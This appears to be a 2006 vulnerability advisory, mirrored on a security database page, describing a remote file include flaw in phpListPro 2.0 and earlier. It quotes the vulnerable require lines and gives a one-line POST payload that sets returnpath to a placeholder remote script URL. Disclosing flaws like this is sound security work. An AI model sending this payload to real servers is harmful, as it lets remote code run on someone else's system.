Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12178
HistoryApr 12, 2006 - 12:00 a.m.

phpListPro <= 2.0 - Remote File Include Vulnerability

2006-04-1200:00:00
vulners.com
93

phpListPro <= 2.0 - Remote File Include Vulnerability

Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risc: High

Credits:

'Aesthetico'
http://www.majorsecurity.de

Description:

PHP/mySQL rating TopList professional.

Vulnerability:

The config.php is vulnerable at following lines:

142: require ($returnpath."lang_".$default_language.".php");
143: require ($returnpath."library.php");

Solution:

There isn't a solution yet.

Exploitation:

Post data:
returnpath=http://www.yourspace.com/yourscript.php?